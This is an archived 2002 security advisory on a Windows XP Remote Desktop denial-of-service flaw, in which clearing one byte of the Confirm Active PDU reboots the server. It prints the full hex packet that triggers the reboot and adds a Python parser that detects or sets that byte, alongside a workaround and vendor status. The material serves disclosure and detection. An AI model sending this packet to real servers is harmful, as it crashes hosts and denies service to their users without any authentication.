[NT] Microsoft Windows XP Remote Desktop Denial of Service Vulnerability

From: support@securiteam.com
To: list@securiteam.com
Date: Wed, 18 Sep 2002 14:25:55 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Microsoft Windows XP Remote Desktop Denial of Service Vulnerability
------------------------------------------------------------------------

SUMMARY

Windows XP Professional is vulnerable to a remote denial of service when
Remote Desktop is enabled. Remote Desktop is XP Professional's single-user
RDP (Terminal Services) server.

DETAILS

Vulnerable systems:
 * Microsoft Windows XP Professional
 * Microsoft Windows .NET Standard Server Beta 3

Immune systems:
 * Microsoft Windows 2000 Server

At the start of the session, client and server negotiate their graphics
capabilities in a packet called the Confirm Active PDU. A block of 32 bytes
in this packet, one byte per drawing order, lets the client switch off the
drawing orders it does not support.

One of these bytes appears to control whether the server sends the Pattern
BLT (PatBlt) order. On Windows 2000 Server, clearing it simply makes the
server send bitmaps instead of PatBlt orders. Windows XP Professional,
however, apparently reboots when it then tries to render a pattern. Because
this happens while the login screen is being drawn, the client need not
have logged on or otherwise authenticated to the server. The behaviour was
observed with every protocol version tested (RDP 4.0, 5.0 and 5.1) and is
reproducible on Windows .NET Standard Server Beta 3.

Workaround:
Disable Remote Desktop: in Control Panel open System, select the Remote
tab and clear "Allow users to connect remotely to this computer".

Exploit:
Shown below is the unencrypted content of the Confirm Active PDU that
triggers the reboot. The only change from the packet the standard client
sends is a single byte, 01 to 00, on the line marked.

c4 01 13 00 f0 03 ea 03 01 00 ea 03 06 00 ae 01
4d 53 54 53 43 00 11 00 00 00 01 00 18 00 01 00
03 00 00 02 00 00 00 00 05 04 00 00 00 00 00 00
00 00 02 00 1c 00 08 00 01 00 01 00 01 00 00 05
00 04 00 00 01 00 01 00 00 00 01 00 00 00 03 00
58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 01 00 14 00 00 00 01 00 00 00
2a 00 01 00 01 01 01 00 00 01 01 01 00 01 00 00 <- was "2a 00 01 01"
00 01 01 01 01 01 01 01 01 00 01 01 01 00 00 00
00 00 a1 06 00 00 00 00 00 00 00 84 03 00 00 00
00 00 e4 04 00 00 13 00 28 00 01 00 00 03 78 00
00 00 78 00 00 00 f3 09 00 80 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 00
08 00 06 00 00 00 07 00 0c 00 00 00 00 00 00 00
00 00 05 00 0c 00 00 00 00 00 02 00 02 00 08 00
0a 00 01 00 14 00 15 00 09 00 08 00 00 00 00 00
0d 00 58 00 05 00 08 00 09 08 00 00 04 00 00 00
00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 0c 00 08 00 01 00 00 00
0e 00 08 00 01 00 00 00 10 00 34 00 fe 00 04 00
fe 00 04 00 fe 00 08 00 fe 00 08 00 fe 00 10 00
fe 00 20 00 fe 00 40 00 fe 00 80 00 fe 00 00 01
40 00 00 08 00 01 00 01 03 00 00 00 0f 00 08 00
01 00 00 00 11 00 0c 00 01 00 00 00 00 0a 64 00
14 00 08 00 01 00 00 00 15 00 0c 00 01 00 00 00
00 0a 00 01
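
The capability negotiation described under DETAILS, applied to the packet above, as an added example that is not part of the advisory: the Python below parses the Confirm Active PDU byte for byte (field names and offsets taken from Microsoft's public MS-RDPBCGR specification, which documents the same structure the advisory's T.128 reference describes), locates the 32-byte orderSupport array inside the Order Capability Set, reports which drawing orders the client has cleared, and confirms that the dump differs from an unmodified client's packet in exactly one byte, orderSupport[1] (the PatBlt slot) at offset 115. The function and constant names are the example's own.

```python
"""Decode the Confirm Active PDU quoted in the advisory and inspect its
orderSupport array.  Added example, not part of the advisory; the field layout
is Microsoft's public MS-RDPBCGR description of TS_CONFIRM_ACTIVE_PDU and
TS_ORDER_CAPABILITYSET (the T.128 negotiation the advisory cites)."""
import struct

# The 452-byte unencrypted PDU exactly as printed in the advisory, with only
# the "<- was ..." annotation dropped (two dump lines per string line).
CONFIRM_ACTIVE_HEX = """
c4 01 13 00 f0 03 ea 03 01 00 ea 03 06 00 ae 01 4d 53 54 53 43 00 11 00 00 00 01 00 18 00 01 00
03 00 00 02 00 00 00 00 05 04 00 00 00 00 00 00 00 00 02 00 1c 00 08 00 01 00 01 00 01 00 00 05
00 04 00 00 01 00 01 00 00 00 01 00 00 00 03 00 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 01 00 14 00 00 00 01 00 00 00 2a 00 01 00 01 01 01 00 00 01 01 01 00 01 00 00
00 01 01 01 01 01 01 01 01 00 01 01 01 00 00 00 00 00 a1 06 00 00 00 00 00 00 00 84 03 00 00 00
00 00 e4 04 00 00 13 00 28 00 01 00 00 03 78 00 00 00 78 00 00 00 f3 09 00 80 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 00 08 00 06 00 00 00 07 00 0c 00 00 00 00 00 00 00
00 00 05 00 0c 00 00 00 00 00 02 00 02 00 08 00 0a 00 01 00 14 00 15 00 09 00 08 00 00 00 00 00
0d 00 58 00 05 00 08 00 09 08 00 00 04 00 00 00 00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 08 00 01 00 00 00
0e 00 08 00 01 00 00 00 10 00 34 00 fe 00 04 00 fe 00 04 00 fe 00 08 00 fe 00 08 00 fe 00 10 00
fe 00 20 00 fe 00 40 00 fe 00 80 00 fe 00 00 01 40 00 00 08 00 01 00 01 03 00 00 00 0f 00 08 00
01 00 00 00 11 00 0c 00 01 00 00 00 00 0a 64 00 14 00 08 00 01 00 00 00 15 00 0c 00 01 00 00 00
00 0a 00 01
"""
PDU = bytes.fromhex(CONFIRM_ACTIVE_HEX)

PDUTYPE_CONFIRMACTIVEPDU = 0x3  # low four bits of pduType
CAPSTYPE_ORDER = 0x0003
ORDER_SUPPORT_LEN = 32
PATBLT_INDEX = 1  # TS_NEG_PATBLT_INDEX (0 = DstBlt, 2 = ScrBlt, 3 = MemBlt, 4 = Mem3Blt)


def parse_confirm_active(pdu):
    """Return the header fields and a {type: (offset, body)} map of capability
    sets, rejecting any length that does not add up (the first check a server
    should make before trusting capability data)."""
    if len(pdu) < 16:
        raise ValueError("PDU too short")
    total_length, pdu_type, pdu_source = struct.unpack_from("<HHH", pdu, 0)
    if total_length != len(pdu):
        raise ValueError("totalLength does not match PDU size")
    if pdu_type & 0x0F != PDUTYPE_CONFIRMACTIVEPDU:
        raise ValueError("not a Confirm Active PDU")
    share_id, originator_id, len_src, len_caps = struct.unpack_from("<IHHH", pdu, 6)
    off = 16 + len_src  # sourceDescriptor ("MSTSC\0" here) ends at this offset
    if len_caps != len(pdu) - off:
        raise ValueError("lengthCombinedCapabilities does not match")
    number_caps = struct.unpack_from("<H", pdu, off)[0]
    off += 4  # numberCapabilities + pad2Octets
    caps = {}
    for _ in range(number_caps):
        ctype, clen = struct.unpack_from("<HH", pdu, off)
        if clen < 4 or off + clen > len(pdu):
            raise ValueError("bad capability set length at offset %d" % off)
        caps[ctype] = (off, pdu[off + 4:off + clen])
        off += clen
    if off != len(pdu):
        raise ValueError("trailing bytes after capability sets")
    return {"pduSource": pdu_source, "shareId": share_id, "originatorId": originator_id,
            "sourceDescriptor": pdu[16:16 + len_src], "capabilitySets": caps}


def order_support_offset(parsed):
    """Absolute offset of orderSupport[0]: the 4-byte set header, 16-byte
    terminalDescriptor, 4-byte pad and six 16-bit fields come before it."""
    off, body = parsed["capabilitySets"][CAPSTYPE_ORDER]
    if len(body) < 32 + ORDER_SUPPORT_LEN:
        raise ValueError("Order Capability Set truncated")
    return off + 4 + 32


def order_support(pdu):
    start = order_support_offset(parse_confirm_active(pdu))
    return pdu[start:start + ORDER_SUPPORT_LEN]


def disabled_orders(pdu):
    """Indices the client has cleared (0 = order not supported)."""
    return [i for i, v in enumerate(order_support(pdu)) if v == 0]


def patblt_disabled(pdu):
    """The condition the advisory describes: PatBlt withdrawn by the client."""
    return order_support(pdu)[PATBLT_INDEX] == 0


def set_order_support(pdu, index, value):
    """Copy of pdu with orderSupport[index] = value; called with
    (PATBLT_INDEX, 1) it rebuilds the unmodified client packet."""
    if not (0 <= index < ORDER_SUPPORT_LEN and value in (0, 1)):
        raise ValueError("index or value out of range")
    pos = order_support_offset(parse_confirm_active(pdu)) + index
    return pdu[:pos] + bytes([value]) + pdu[pos + 1:]


def diff_offsets(a, b):
    return [i for i, (x, y) in enumerate(zip(a, b)) if x != y]


if __name__ == "__main__":
    print("cleared orderSupport indices:", disabled_orders(PDU))
    print("PatBlt disabled:", patblt_disabled(PDU))
    print("bytes changed from the unmodified client packet:",
          diff_offsets(PDU, set_order_support(PDU, PATBLT_INDEX, 1)))
```

The `patblt_disabled` check is what a server-side or IDS-side validator would apply to inbound Confirm Active PDUs; on the wire this PDU sits inside RDP's security layer and has to be decrypted first, as the advisory's dump already is. The length checks in `parse_confirm_active` are deliberately strict: a server that renders from capability data it has not bounds-checked is trusting an unauthenticated client, which is exactly the position the advisory shows XP to be in.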

References:
ITU-T Recommendation T.128, Multipoint application sharing (Series T:
Terminals for telematic services), section 8.2.5.

Vendor status:
Microsoft was notified on 16 April 2002.

ADDITIONAL INFORMATION

The information has been provided by <mailto:bc@skygate.co.uk> Ben Cohen.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
